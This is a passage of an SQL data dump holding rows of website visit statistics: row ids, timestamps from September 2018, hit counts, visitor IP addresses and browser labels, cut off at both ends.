5.214.218','chrome'),(297586,1535969047,1,1,0,0,'91.196.178.90','firefox'),(297587,1535969173,1,1,0,0,'91.196.178.89','firefox'),(297588,1535969227,2,2,0,0,'54.208.102.37','other'),(297589,1535969455,1,1,0,0,'107.21.1.8','other'),(297590,1535969573,1,1,0,0,'79.137.143.146','chrome'),(297591,1535969731,1,1,0,0,'8.29.198.25','other'),(297592,1535970129,1,1,0,0,'141.8.142.74','other'),(297593,1535970224,1,1,0,0,'106.38.241.101','other'),(297594,1535970627,1,1,0,0,'91.196.178.166','chrome'),(297595,1535970893,3,3,0,0,'216.244.66.241','other'),(297596,1535972033,2,2,0,0,'141.8.142.74','other'),(297597,1535972098,1,1,0,0,'92.113.189.235','chrome'),(297598,1535972300,1,1,0,0,'95.163.255.165','other'),(297599,1535973013,1,1,0,0,'141.8.142.74','other'),(297600,1535973406,1,1,0,0,'216.244.66.241','other'),(297601,1535974157,2,2,0,0,'62.205.134.182','msie'),(297602,1535974388,1,0,1,0,'66.249.66.155',''),(297603,1535974598,1,1,0,0,'141.8.142.74','other'),(297604,1535975659,1,1,0,0,'77.109.20.226','opera'),(297605,1535976132,1,1,0,0,'91.196.178.130','firefox'),(297606,1535976483,1,1,0,0,'91.196.178.90','firefox'),(297607,1535976653,1,1,0,0,'216.244.66.241','other'),(297608,1535976897,2,2,0,0,'91.196.177.46','chrome'),(297609,1535976993,1,1,0,0,'207.46.13.112','other'),(297610,1535978775,1,1,0,0,'216.244.66.241','other'),(297611,1535978848,1,1,0,0,'95.163.255.98','other'),(297612,1535978949,1,1,0,0,'31.43.31.234','chrome'),(297613,1535980462,1,1,0,0,'40.77.167.128','other'),(297614,1535980532,1,0,1,0,'66.249.66.157',''),(297615,1535980609,1,1,0,0,'8.29.198.26','other'),(297616,1535980681,2,2,0,0,'80.78.39.180','chrome'),(297617,1535982051,1,1,0,0,'91.196.177.46','chrome'),(297618,1535982143,1,1,0,0,'46.211.104.2','chrome'),(297619,1535982234,1,1,0,0,'91.124.182.170','firefox'),(297620,1535982260,1,1,0,0,'216.244.66.241','other'),(297621,1535982301,1,1,0,0,'66.249.66.156','chrome'),(297622,1535982586,1,1,0,0,'66.102.9.22','chrome'),(297623,1535982956,1,1,0,0,'37.55.227.21','opera'),(297624,1535983061,1,1,0,0,'91.196.178.131','firefox'),(297625,1535983081,1,1,0,0,'91.196.178.90','chrome'),(297626,1535983088,1,1,0,0,'178.154.171.88','other'),(297627,1535983092,1,1,0,0,'178.154.200.41','other'),(297628,1535983176,1,1,0,0,'95.163.255.157','other'),(297629,1535984374,1,0,1,0,'66.249.66.156',''),(297630,1535984754,1,1,0,0,'178.154.171.88','other'),(297631,1535985850,1,1,0,0,'92.113.189.235','chrome'),(297632,1535986794,1,1,0,0,'62.205.134.182','firefox'),(297633,1535986807,1,1,0,0,'77.123.139.189','other'),(297634,1535986926,1,1,0,0,'188.230.43.254','other'),(297635,1535986997,1,1,0,0,'178.154.171.88','other'),(297636,1535987522,1,1,0,0,'66.249.66.57','chrome'),(297637,1535987631,1,0,1,0,'66.249.66.59',''),(297638,1535987995,1,1,0,0,'207.46.13.112','other'),(297639,1535989325,1,1,0,0,'188.230.43.254','other'),(297640,1535991040,2,1,1,0,'66.249.66.157',''),(297641,1535991477,1,1,0,0,'8.29.198.25','other'),(297642,1535991727,1,1,0,0,'188.230.43.254','other'),(297643,1535994663,1,1,0,0,'216.244.66.241','other'),(297644,1535994720,1,1,0,0,'66.249.66.155','chrome'),(297645,1535994895,2,0,2,0,'66.249.66.59',''),(297646,1535995695,1,1,0,0,'157.55.39.10','other'),(297647,1535995959,1,1,0,0,'95.163.255.105','other'),(297648,1535995965,1,1,0,0,'95.163.255.115','other'),(297649,1535995971,1,1,0,0,'95.163.255.116','other'),(297650,1535995976,1,1,0,0,'95.163.255.113','other'),(297651,1535996819,1,1,0,0,'66.249.66.61','chrome'),(297652,1535996868,1,0,1,0,'66.249.66.155',''),(297653,1535997694,1,1,0,0,'40.77.167.128','other'),(297654,1535997738,1,1,0,0,'176.98.70.29','chrome'),(297655,1535997854,1,1,0,0,'91.196.178.74','chrome'),(297656,1535998601,1,1,0,0,'91.196.178.61','chrome'),(297657,1536000454,1,1,0,0,'207.46.13.235','other'),(297658,1536001144,1,1,0,0,'141.8.142.74','other'),(297659,1536002239,2,2,0,0,'46.211.99.5','chrome'),(297660,1536002284,1,1,0,0,'40.77.167.15','other'),(297661,1536002337,1,1,0,0,'8.29.198.25','other'),(297662,1536002430,1,1,0,0,'178.92.156.248','chrome'),(297663,1536002828,1,1,0,0,'37.9.113.182','other'),(297664,1536002851,1,1,0,0,'141.8.142.74','other'),(297665,1536003754,1,0,1,0,'66.249.66.157',''),(297666,1536004053,2,2,0,0,'178.95.67.56','chrome'),(297667,1536004490,1,1,0,0,'5.188.210.51','chrome'),(297668,1536004754,1,1,0,0,'141.8.142.74','other'),(297669,1536004855,723,723,0,0,'194.68.17.5','other'),(297670,1536005467,1,1,0,0,'178.154.171.88','other'),(297671,1536005596,1,0,1,0,'66.249.66.59',''),(297672,1536005605,1,1,0,0,'66.249.66.157','chrome'),(297673,1536005641,1,1,0,0,'66.249.66.59','chrome'),(297674,1536005757,137,137,0,0,'194.68.17.5','other'),(297675,1536007015,1,0,1,0,'66.249.66.155',''),(297676,1536008798,1,1,0,0,'185.191.204.7','chrome'),(297677,1536008997,1,1,0,0,'141.8.142.74','other'),(297678,1536010482,1,1,0,0,'91.209.11.236','other'),(297679,1536010518,1,1,0,0,'178.154.171.88','other'),(297680,1536011181,1,1,0,0,'66.102.9.134','chrome'),(297681,1536011345,1,1,0,0,'216.244.66.241','other'),(297682,1536013208,1,1,0,0,'8.29.198.27','other'),(297683,1536013434,2,0,2,0,'66.249.66.155',''),(297684,1536013520,2,2,0,0,'141.8.142.74','other'),(297685,1536014017,9,9,0,0,'40.77.167.128','other'),(297686,1536014022,8,8,0,0,'40.77.167.129','other'),(297687,1536014096,6,6,0,0,'157.55.39.216','other'),(297688,1536014514,1,0,1,0,'66.249.66.61',''),(297689,1536014521,1,1,0,0,'66.249.66.157','chrome'),(297690,1536014527,1,1,0,0,'66.249.66.61','chrome'),(297691,1536014967,1,1,0,0,'141.8.142.74','other'),(297692,1536015801,1,0,1,0,'66.249.66.155',''),(297693,1536017324,2,0,2,0,'66.249.66.155',''),(297694,1536017384,1,1,0,0,'157.55.39.216','other'),(297695,1536017632,1,0,1,0,'66.249.66.156',''),(297696,1536017914,1,1,0,0,'37.9.113.182','other'),(297697,1536017940,1,1,0,0,'141.8.142.74','other'),(297698,1536019408,1,0,1,0,'66.249.66.157',''),(297699,1536020929,1,1,0,0,'141.8.142.74','other'),(297700,1536021519,1,0,1,0,'66.249.66.157',''),(297701,1536021550,1,0,1,0,'66.249.66.57',''),(297702,1536021557,2,1,1,0,'66.249.66.155',''),(297703,1536021599,1,1,0,0,'66.249.66.59','chrome'),(297704,1536021896,1,0,1,0,'66.249.66.156',''),(297705,1536022220,1,1,0,0,'91.209.11.236','other'),(297706,1536022990,1,0,1,0,'66.249.66.156',''),(297707,1536024087,1,1,0,0,'8.29.198.25','other'),(297708,1536024925,1,0,1,0,'66.249.66.155',''),(297709,1536025035,1,1,0,0,'95.163.255.170','other'),(297710,1536025571,1,1,0,0,'40.77.167.128','other'),(297711,1536026075,1,1,0,0,'37.9.113.182','other'),(297712,1536026093,1,1,0,0,'178.154.171.88','other'),(297713,1536026523,1,0,1,0,'66.249.66.155',''),(297714,1536026948,1,1,0,0,'216.244.66.241','other'),(297715,1536027250,1,0,1,0,'66.249.66.157',''),(297716,1536027312,1,0,1,0,'66.249.66.61',''),(297717,1536027319,1,1,0,0,'66.249.66.57','chrome'),(297718,1536028236,3,0,3,0,'66.249.66.156',''),(297719,1536029260,1,1,0,0,'158.69.52.114','chrome'),(297720,1536029484,2,2,0,0,'216.244.66.241','other'),(297721,1536030156,1,1,0,0,'35.162.70.167','chrome'),(297722,1536031216,1,0,1,0,'66.249.66.155',''),(297723,1536031792,1,1,0,0,'157.55.39.216','other'),(297724,1536032196,1,0,1,0,'66.249.66.156',''),(297725,1536032392,1,0,1,0,'66.249.66.155',''),(297726,1536032483,1,1,0,0,'66.249.66.57','chrome'),(297727,1536033624,3,3,0,0,'85.10.206.20','other'),(297728,1536033712,1,0,1,0,'66.249.66.157',''),(297729,1536034123,1,0,1,0,'66.249.66.61',''),(297730,1536034796,2,0,2,0,'66.249.66.156',''),(297731,1536034956,1,1,0,0,'8.29.198.27','other'),(297732,1536035005,1,1,0,0,'173.252.127.1','chrome'),(297733,1536035407,1,1,0,0,'141.8.142.74','other'),(297734,1536037439,1,1,0,0,'216.244.66.241','other'),(297735,1536037617,1,1,0,0,'141.8.142.74','other'),(297736,1536037623,1,1,0,0,'77.111.247.11','chrome'),(297737,1536037808,1,1,0,0,'163.172.4.153','chrome'),(297738,1536038332,1,1,0,0,'77.111.244.58','chrome'),(297739,1536038969,1,1,0,0,'91.196.178.97','other'),(297740,1536039039,1,1,0,0,'91.196.177.46','chrome'),(297741,1536039312,2,2,0,0,'141.8.142.74','other'),(297742,1536039386,1,1,0,0,'66.249.66.57','chrome'),(297743,1536039573,3,3,0,0,'91.196.178.89','chrome'),(297745,1536039601,1,0,1,0,'66.249.66.155',''),(297746,1536039768,1,0,1,0,'66.249.66.61',''),(297747,1536039980,1,1,0,0,'91.196.177.46','chrome'),(297748,1536040723,1,1,0,0,'52.53.201.78','chrome'),(297749,1536041406,1,1,0,0,'176.118.51.20','chrome'),(297750,1536041417,1,0,1,0,'66.249.66.157',''),(297751,1536041620,1,1,0,0,'66.102.9.134','chrome'),(297752,1536041621,1,1,0,0,'66.102.9.131','chrome'),(297753,1536042817,1,1,0,0,'199.58.86.211','other'),(297754,1536043252,1,1,0,0,'91.196.178.134','firefox'),(297755,1536044163,1,0,1,0,'66.249.66.157',''),(297756,1536044477,1,1,0,0,'141.8.142.74','other'),(297757,1536044481,1,1,0,0,'87.250.224.46','other'),(297758,1536044628,1,1,0,0,'180.76.15.147','other'),(297759,1536044934,1,1,0,0,'66.249.66.59','chrome'),(297760,1536045000,1,0,1,0,'66.249.66.61',''),(297761,1536045032,2,2,0,0,'178.154.171.88','other'),(297762,1536045820,1,1,0,0,'8.29.198.27','other'),(297763,1536046142,1,1,0,0,'194.44.201.152','chrome'),(297764,1536046209,1,1,0,0,'40.77.167.129','other'),(297765,1536046260,1,1,0,0,'216.244.66.241','other'),(297766,1536046313,1,1,0,0,'91.196.177.46','firefox'),(297767,1536046801,1,1,0,0,'92.113.189.235','chrome'),(297768,1536047027,1,0,1,0,'66.249.66.157',''),(297769,1536047775,1,1,0,0,'91.196.178.90','firefox'),(297770,1536047840,1,1,0,0,'141.8.142.74','other'),(297771,1536048705,1,1,0,0,'216.244.66.241','other'),(297772,1536048937,1,1,0,0,'94.230.196.133','chrome'),(297773,1536049769,1,1,0,0,'104.168.7.39','firefox'),(297774,1536049803,1,1,0,0,'54.165.59.7','other'),(297775,1536050160,1,1,0,0,'66.249.66.61','chrome'),(297776,1536050191,1,0,1,0,'66.249.66.59',''),(297777,1536050274,1,1,0,0,'91.196.177.46','chrome'),(297778,1536050402,1,1,0,0,'178.154.171.88','other'),(297779,1536051062,1,1,0,0,'95.163.255.98','other'),(297780,1536051656,1,1,0,0,'23.106.248.109','chrome'),(297781,1536051815,1,1,0,0,'13.66.139.0','other'),(297782,1536052028,1,1,0,0,'207.241.229.148','other'),(297783,1536052054,1,1,0,0,'178.94.242.41','chrome'),(297784,1536052539,1,0,1,0,'66.249.66.155',''),(297785,1536052645,2,2,0,0,'66.102.9.134','chrome'),(297786,1536052720,1,1,0,0,'91.196.178.89','chrome'),(297787,1536052916,1,1,0,0,'178.95.67.148','chrome'),(297788,1536052928,3,3,0,0,'91.196.177.15','chrome'),(297789,1536053085,2,2,0,0,'46.219.77.169','chrome'),(297790,1536053422,1,1,0,0,'95.27.82.53','msie'),(297791,1536053526,1,1,0,0,'216.244.66.241','other'),(297792,1536053548,1,1,0,0,'178.92.15.249','firefox'),(297793,1536053747,1,1,0,0,'180.76.15.14','other'),(297794,1536053979,1,1,0,0,'95.132.28.70','firefox'),(297795,1536054540,1,1,0,0,'54.165.59.7','other'),(297796,1536054552,3,3,0,0,'178.154.171.88','other'),(297797,1536054939,1,1,0,0,'178.95.67.148','chrome'),(297798,1536055220,1,1,0,0,'91.196.178.91','firefox'),(297799,1536055447,1,1,0,0,'66.249.66.61','chrome'),(297800,1536055451,1,0,1,0,'66.249.66.57',''),(297801,1536055902,1,1,0,0,'185.191.204.7','chrome'),(297802,1536056139,1,1,0,0,'216.244.66.241','other'),(297803,1536056355,1,1,0,0,'40.77.167.129','other'),(297804,1536056716,1,1,0,0,'8.29.198.27','other'),(297805,1536057877,1,1,0,0,'87.228.16.209','msie'),(297806,1536058142,1,0,1,0,'66.249.66.155',''),(297807,1536058221,1,1,0,0,'216.244.66.241','other'),(297808,1536058304,1,1,0,0,'91.196.178.50','chrome'),(297809,1536059199,1,1,0,0,'62.210.101.101','other'),(297810,1536059473,1,0,1,0,'66.249.66.157',''),(297811,1536059601,1,1,0,0,'178.154.171.88','other'),(297812,1536059646,1,0,1,0,'66.249.66.57',''),(297813,1536059652,1,1,0,0,'66.249.66.57','chrome'),(297814,1536060103,1,1,0,0,'95.163.255.191','other'),(297815,1536060528,1,1,0,0,'95.132.54.49','firefox'),(297816,1536060855,1,1,0,0,'91.196.177.15','chrome'),(297817,1536061127,1,1,0,0,'216.244.66.241','other'),(297818,1536061364,1,1,0,0,'95.215.42.49','firefox'),(297819,1536061968,1,1,0,0,'178.95.41.156','firefox'),(297820,1536061979,1,1,0,0,'91.124.182.170','firefox'),(297821,1536062122,1,0,1,0,'66.249.66.155',''),(297822,1536063495,1,1,0,0,'46.242.15.2','msie'),(297823,1536064223,1,1,0,0,'178.154.171.88','other'),(297824,1536064266,1,1,0,0,'207.241.231.147','other'),(297825,1536064533,1,1,0,0,'95.135.191.150','firefox'),(297826,1536065466,1,1,0,0,'91.196.178.170','chrome'),(297827,1536065623,1,0,1,0,'66.249.66.156',''),(297828,1536065763,2,2,0,0,'91.196.178.78','chrome'),(297829,1536065909,1,0,1,0,'66.249.66.157',''),(297830,1536066000,1,1,0,0,'54.165.59.7','other'),(297831,1536066244,1,0,1,0,'66.249.66.61',''),(297832,1536066250,1,1,0,0,'66.249.66.59','chrome'),(297833,1536066548,1,1,0,0,'37.54.170.30','chrome'),(297834,1536066650,2,2,0,0,'141.8.142.74','other'),(297835,1536066673,1,1,0,0,'91.196.178.78','chrome'),(297836,1536066796,1,1,0,0,'95.132.54.49','firefox'),(297837,1536066976,1,1,0,0,'66.102.9.136','chrome'),(297838,1536067196,1,1,0,0,'95.133.1.0','chrome'),(297839,1536067283,1,1,0,0,'216.244.66.241','other'),(297840,1536067305,1,0,1,0,'79.7.218.134',''),(297841,1536067698,1,1,0,0,'8.29.198.26','other'),(297842,1536067853,1,1,0,0,'91.124.182.170','firefox'),(297843,1536068826,1,1,0,0,'195.43.70.10','chrome'),(297844,1536069226,1,1,0,0,'141.8.142.74','other'),(297845,1536069619,1,0,1,0,'66.249.66.156',''),(297846,1536069846,2,2,0,0,'91.196.177.46','chrome'),(297847,1536070618,1,1,0,0,'79.3.69.168','other'),(297848,1536070677,1,0,1,0,'66.249.66.157',''),(297849,1536070736,1,1,0,0,'91.196.178.94','firefox'),(297850,1536071494,1,0,1,0,'66.249.66.61',''),(297851,1536071500,1,1,0,0,'66.249.66.59','chrome'),(297852,1536072595,1,1,0,0,'46.242.62.64','chrome'),(297853,1536072880,1,1,0,0,'207.241.231.143','other'),(297854,1536073303,2,2,0,0,'141.8.142.74','other'),(297855,1536073597,1,0,1,0,'66.249.66.156',''),(297856,1536074197,1,1,0,0,'144.76.91.79','other'),(297857,1536074384,1,1,0,0,'40.77.167.120','other'),(297858,1536075013,1,1,0,0,'207.241.229.51','other'),(297859,1536075022,1,1,0,0,'77.123.28.184','chrome'),(297860,1536075743,1,1,0,0,'54.165.59.7','other'),(297861,1536075920,1,1,0,0,'207.241.229.148','other'),(297862,1536076261,1,0,1,0,'66.249.66.157',''),(297863,1536076348,1,1,0,0,'207.241.229.51','other'),(297864,1536076821,1,1,0,0,'207.241.229.148','other'),(297865,1536076871,1,1,0,0,'216.244.66.241','other'),(297866,1536077208,1,1,0,0,'207.241.231.151','other'),(297867,1536077264,1,0,1,0,'66.249.66.57',''),(297868,1536077294,1,1,0,0,'66.249.66.59','chrome'),(297869,1536077725,2,2,0,0,'207.241.229.148','other'),(297870,1536077825,1,1,0,0,'141.8.142.74','other'),(297871,1536077918,2,2,0,0,'207.241.229.51','other'),(297872,1536078112,2,2,0,0,'207.241.231.151','other'),(297873,1536078324,1,1,0,0,'178.154.171.88','other'),(297874,1536078605,1,1,0,0,'8.29.198.26','other'),(297875,1536079010,1,1,0,0,'207.46.13.64','other'),(297876,1536079349,2,2,0,0,'207.241.231.143','other'),(297877,1536079424,2,0,2,0,'66.249.66.157',''),(297878,1536079509,5,5,0,0,'207.241.231.151','other'),(297879,1536079739,1,1,0,0,'80.252.153.33','chrome'),(297880,1536079858,2,2,0,0,'207.241.229.51','other'),(297881,1536080146,1,1,0,0,'216.244.66.241','other'),(297882,1536080430,2,2,0,0,'207.241.231.143','other'),(297883,1536080485,2,2,0,0,'207.241.229.148','other'),(297884,1536080922,2,2,0,0,'141.8.142.74','other'),(297885,1536080946,1,0,1,0,'66.249.66.155',''),(297886,1536081068,2,2,0,0,'207.241.231.151','other'),(297887,1536081113,1,1,0,0,'207.241.229.213','other'),(297888,1536081524,5,5,0,0,'207.241.229.51','other'),(297889,1536081551,2,2,0,0,'207.241.231.143','other'),(297890,1536081727,1,1,0,0,'91.196.178.177','chrome'),(297891,1536081946,2,2,0,0,'207.241.229.148','other'),(297892,1536082016,4,4,0,0,'207.241.229.213','other'),(297893,1536082113,2,2,0,0,'207.241.231.151','other'),(297894,1536082445,1,1,0,0,'216.244.66.241','other'),(297895,1536082462,5,5,0,0,'207.241.229.51','other'),(297896,1536082608,4,4,0,0,'207.241.231.143','other'),(297897,1536082792,1,0,1,0,'66.249.66.59',''),(297898,1536082837,1,1,0,0,'66.249.66.59','chrome'),(297899,1536083060,2,2,0,0,'95.163.255.115','other'),(297900,1536083065,1,1,0,0,'95.163.255.112','other'),(297901,1536083070,1,1,0,0,'95.163.255.102','other'),(297902,1536083261,1,1,0,0,'207.241.231.151','other'),(297903,1536083297,6,6,0,0,'207.241.229.213','other'),(297904,1536083530,1,1,0,0,'40.77.167.71','other'),(297905,1536083574,3,3,0,0,'207.241.229.51','other'),(297906,1536083584,1,1,0,0,'95.163.255.94','other'),(297907,1536083627,2,2,0,0,'207.241.231.143','other'),(297908,1536083771,4,4,0,0,'207.241.229.148','other'),(297909,1536084010,2,0,2,0,'66.249.66.156',''),(297910,1536084304,1,1,0,0,'92.113.189.235','chrome'),(297911,1536084621,1,1,0,0,'207.241.231.143','other'),(297912,1536084766,3,3,0,0,'207.241.229.213','other'),(297913,1536084809,1,1,0,0,'87.250.224.46','other'),(297914,1536084940,4,4,0,0,'207.241.229.148','other'),(297915,1536085084,3,3,0,0,'207.241.231.151','other'),(297916,1536085134,1,0,1,0,'66.249.66.156',''),(297917,1536085207,3,3,0,0,'207.241.229.51','other'),(297918,1536085598,1,1,0,0,'207.241.231.143','other'),(297919,1536085645,1,1,0,0,'5.188.210.51','chrome'),(297920,1536085980,2,2,0,0,'207.241.229.213','other'),(297921,1536086154,1,1,0,0,'207.241.229.148','other'),(297922,1536086192,1,1,0,0,'40.77.167.120','other'),(297923,1536086419,1,1,0,0,'94.179.187.18','chrome'),(297924,1536087619,1,1,0,0,'216.244.66.241','other'),(297925,1536087960,1,0,1,0,'66.249.66.61',''),(297926,1536088038,1,1,0,0,'66.249.66.59','chrome'),(297927,1536088293,2,2,0,0,'91.196.178.75','firefox'),(297928,1536088899,1,1,0,0,'178.93.161.150','chrome'),(297929,1536089488,1,1,0,0,'8.29.198.27','other'),(297930,1536089767,1,1,0,0,'216.244.66.241','other'),(297931,1536090171,1,0,1,0,'66.249.66.157',''),(297932,1536090614,1,1,0,0,'46.211.27.214','other'),(297933,1536090665,1,0,1,0,'66.249.66.155',''),(297934,1536091295,2,2,0,0,'40.77.167.71','other'),(297935,1536092975,1,0,1,0,'66.249.66.157',''),(297936,1536093693,1,0,1,0,'66.249.66.57',''),(297937,1536093703,1,1,0,0,'66.249.66.57','chrome'),(297938,1536094737,2,2,0,0,'192.99.0.114','other'),(297939,1536095116,1,0,1,0,'66.249.66.155',''),(297940,1536095516,1,1,0,0,'216.244.66.241','other'),(297941,1536095618,1,0,1,0,'66.249.66.157',''),(297942,1536095983,2,2,0,0,'141.8.142.74','other'),(297943,1536096167,15,15,0,0,'23.237.4.26','other'),(297944,1536096481,1,0,1,0,'66.249.66.57',''),(297945,1536096860,2,2,0,0,'192.99.0.114','other'),(297946,1536097546,1,1,0,0,'178.140.18.173','chrome'),(297947,1536097690,1,1,0,0,'216.244.66.241','other'),(297948,1536098480,1,1,0,0,'207.46.13.64','other'),(297949,1536098847,1,0,1,0,'66.249.66.157',''),(297950,1536098961,1,1,0,0,'141.8.142.74','other'),(297951,1536099197,1,1,0,0,'66.249.66.61','chrome'),(297952,1536100350,1,1,0,0,'8.29.198.25','other'),(297953,1536100621,1,0,1,0,'66.249.66.26',''),(297954,1536101151,1,0,1,0,'66.249.66.73',''),(297955,1536102221,1,1,0,0,'40.77.167.71','other'),(297956,1536104460,1,0,1,0,'66.249.66.73',''),(297957,1536104650,1,1,0,0,'66.249.66.26','chrome'),(297958,1536106571,2,2,0,0,'141.8.142.74','other'),(297959,1536107012,1,0,1,0,'66.249.66.74',''),(297960,1536107420,1,0,1,0,'66.249.66.25',''),(297961,1536107637,1,1,0,0,'157.55.39.141','other'),(297962,1536108232,1,1,0,0,'216.244.66.241','other'),(297963,1536108662,1,0,1,0,'66.249.66.73',''),(297964,1536110475,1,1,0,0,'128.69.219.33','chrome'),(297965,1536110848,1,0,1,0,'66.249.66.75',''),(297966,1536110927,1,1,0,0,'66.249.66.74','chrome'),(297967,1536110930,1,1,0,0,'66.249.66.75','chrome'),(297968,1536111122,1,1,0,0,'157.55.39.141','other'),(297969,1536111244,1,1,0,0,'8.29.198.27','other'),(297970,1536111301,1,1,0,0,'66.249.66.25','chrome'),(297971,1536111773,1,1,0,0,'216.244.66.241','other'),(297972,1536112037,2,2,0,0,'141.8.142.74','other'),(297973,1536112271,1,1,0,0,'52.41.211.72','chrome'),(297974,1536113021,2,2,0,0,'62.138.2.243','other'),(297975,1536113455,1,0,1,0,'66.249.66.26',''),(297976,1536113787,2,0,2,0,'66.249.66.74',''),(297977,1536113865,1,0,1,0,'66.249.66.27',''),(297978,1536114336,1,1,0,0,'216.244.66.241','other'),(297979,1536116721,1,1,0,0,'66.249.66.26','chrome'),(297980,1536117123,1,1,0,0,'87.250.224.46','other'),(297981,1536117563,1,0,1,0,'66.249.66.75',''),(297982,1536117994,1,1,0,0,'141.8.142.74','other'),(297983,1536118574,1,1,0,0,'193.106.30.98','firefox'),(297984,1536118749,1,0,1,0,'66.249.66.26',''),(297985,1536119655,1,0,1,0,'66.249.66.73',''),(297986,1536119800,1,0,1,0,'66.249.66.74',''),(297987,1536121475,1,1,0,0,'178.154.171.88','other'),(297988,1536122114,1,1,0,0,'8.29.198.26','other'),(297989,1536122308,1,1,0,0,'66.249.66.25','chrome'),(297990,1536122885,1,0,1,0,'66.249.66.74',''),(297991,1536123916,2,2,0,0,'91.196.177.46','chrome'),(297992,1536124179,1,1,0,0,'178.154.171.88','other'),(297993,1536124242,1,0,1,0,'66.249.66.26',''),(297994,1536125532,1,0,1,0,'66.249.66.74',''),(297995,1536125761,1,1,0,0,'66.102.9.22','chrome'),(297996,1536126376,1,1,0,0,'46.219.204.120','chrome'),(297997,1536126645,1,1,0,0,'180.76.15.140','other'),(297998,1536126710,2,2,0,0,'192.99.0.114','other'),(297999,1536127236,1,0,1,0,'66.249.66.75',''),(298000,1536127509,1,1,0,0,'66.249.66.27','chrome'),(298001,1536127612,1,0,1,0,'66.249.66.74',''),(298002,1536127811,1,1,0,0,'195.54.42.26','chrome'),(298003,1536129069,1,0,1,0,'66.249.66.75',''),(298004,1536129280,1,0,1,0,'66.249.66.25',''),(298005,1536129600,2,2,0,0,'192.99.0.114','other'),(298006,1536130005,1,1,0,0,'78.111.189.94','chrome'),(298007,1536130248,1,0,1,0,'66.249.66.74',''),(298008,1536130474,1,1,0,0,'37.53.86.6','chrome'),(298009,1536130812,1,1,0,0,'80.64.80.53','chrome'),(298010,1536132402,1,0,1,0,'66.249.66.73',''),(298011,1536132726,1,1,0,0,'91.196.178.89','firefox'),(298012,1536132842,1,1,0,0,'66.249.66.27','chrome'),(298013,1536132875,1,1,0,0,'46.33.224.133','chrome'),(298014,1536132878,1,1,0,0,'91.196.178.184','chrome'),(298015,1536132983,1,1,0,0,'8.29.198.27','other'),(298016,1536133364,1,1,0,0,'31.43.31.234','chrome'),(298017,1536133383,1,1,0,0,'46.211.2.248','other'),(298018,1536133684,2,0,2,0,'66.249.66.74',''),(298019,1536133838,1,1,0,0,'46.133.71.34','chrome'),(298020,1536134278,1,1,0,0,'5.188.210.51','chrome'),(298021,1536134496,1,0,1,0,'66.249.66.25',''),(298022,1536134566,1,1,0,0,'176.105.212.201','firefox'),(298023,1536134640,1,1,0,0,'216.244.66.241','other'),(298024,1536134727,1,1,0,0,'46.200.3.194','chrome'),(298025,1536134774,1,1,0,0,'40.77.167.71','other'),(298026,1536135712,1,1,0,0,'216.244.66.241','other'),(298027,1536136329,1,0,1,0,'66.249.66.73',''),(298028,1536136989,2,0,2,0,'66.249.66.74',''),(298029,1536137026,2,2,0,0,'188.17.251.69','other'),(298030,1536137373,1,1,0,0,'66.249.66.27','chrome'),(298031,1536137590,1,1,0,0,'162.210.196.129','other'),(298032,1536137641,1,1,0,0,'46.119.40.155','chrome'),(298033,1536138469,1,0,1,0,'66.249.66.73',''),(298034,1536138641,2,2,0,0,'188.17.251.69','other'),(298035,1536138857,1,0,1,0,'66.249.66.74',''),(298036,1536138999,1,1,0,0,'176.109.222.91','firefox'),(298037,1536139079,1,0,1,0,'66.249.66.75',''),(298038,1536139556,1,0,1,0,'66.249.66.25',''),(298039,1536139637,1,1,0,0,'157.55.39.171','other'),(298040,1536139817,2,2,0,0,'141.8.142.74','other'),(298041,1536139821,1,1,0,0,'95.132.41.43','chrome'),(298042,1536139841,1,1,0,0,'216.244.66.241','other'),(298043,1536140192,1,1,0,0,'178.154.171.88','other'),(298044,1536140351,1,1,0,0,'94.178.201.149','chrome'),(298045,1536140646,1,0,1,0,'66.249.66.75',''),(298046,1536140757,2,2,0,0,'216.244.66.241','other'),(298047,1536141134,2,2,0,0,'192.99.0.114','other'),(298048,1536141501,1,1,0,0,'91.242.162.8','other'),(298049,1536142200,1,1,0,0,'46.149.90.99','chrome'),(298050,1536142437,1,1,0,0,'37.53.197.85','chrome'),(298051,1536142881,2,2,0,0,'192.99.0.114','other'),(298052,1536142939,1,1,0,0,'66.249.66.26','chrome'),(298053,1536142974,1,0,1,0,'66.249.66.75',''),(298054,1536143663,1,1,0,0,'91.242.162.8','other'),(298055,1536143845,1,1,0,0,'54.36.148.229','other'),(298056,1536143847,1,1,0,0,'8.29.198.26','other'),(298057,1536144080,1,1,0,0,'54.36.148.119','other'),(298058,1536144191,1,1,0,0,'54.36.148.18','other'),(298059,1536144244,1,1,0,0,'54.36.148.227','other'),(298060,1536144390,1,1,0,0,'54.36.148.169','other'),(298061,1536144505,1,1,0,0,'54.36.148.135','other'),(298062,1536144552,1,1,0,0,'54.36.148.58','other'),(298063,1536144680,1,1,0,0,'54.36.149.32','other'),(298064,1536144735,1,1,0,0,'54.36.149.84','other'),(298065,1536145116,1,0,1,0,'66.249.66.73',''),(298066,1536145155,1,1,0,0,'54.36.148.22','other'),(298067,1536145215,1,0,1,0,'66.249.66.27',''),(298068,1536145363,1,1,0,0,'54.36.148.59','other'),(298069,1536145438,1,1,0,0,'91.242.162.8','other'),(298070,1536145471,1,1,0,0,'54.36.148.127','other'),(298071,1536145726,18,18,0,0,'207.46.13.64','other'),(298072,1536145738,10,10,0,0,'40.77.167.71','other'),(298073,1536145749,9,9,0,0,'40.77.167.120','other'),(298074,1536145759,8,8,0,0,'157.55.39.171','other'),(298075,1536145784,1,1,0,0,'54.36.149.58','other'),(298076,1536145808,1,1,0,0,'54.36.149.67','other'),(298077,1536145845,1,1,0,0,'54.36.148.140','other'),(298078,1536145924,1,1,0,0,'54.36.149.27','other'),(298079,1536146114,1,1,0,0,'54.36.148.18','other'),(298080,1536146243,1,1,0,0,'91.196.178.65','chrome'),(298081,1536146523,1,1,0,0,'54.36.148.60','other'),(298082,1536146702,1,1,0,0,'54.36.149.56','other'),(298083,1536146916,1,1,0,0,'54.36.148.177','other'),(298084,1536147316,1,1,0,0,'54.36.148.146','other'),(298085,1536147382,2,2,0,0,'91.196.178.89','firefox'),(298086,1536147436,1,1,0,0,'95.163.255.95','other'),(298087,1536147444,1,1,0,0,'54.36.149.16','other'),(298088,1536147695,1,0,1,0,'66.249.66.74',''),(298089,1536147719,1,1,0,0,'54.36.149.102','other'),(298090,1536147856,1,1,0,0,'54.36.148.189','other'),(298091,1536148001,1,1,0,0,'54.36.149.104','other'),(298092,1536148065,1,1,0,0,'54.36.149.91','other'),(298093,1536148122,1,1,0,0,'54.36.148.123','other'),(298094,1536148144,1,1,0,0,'54.36.148.155','other'),(298095,1536148361,1,0,1,0,'66.249.66.75',''),(298096,1536148471,1,1,0,0,'91.196.178.134','firefox'),(298097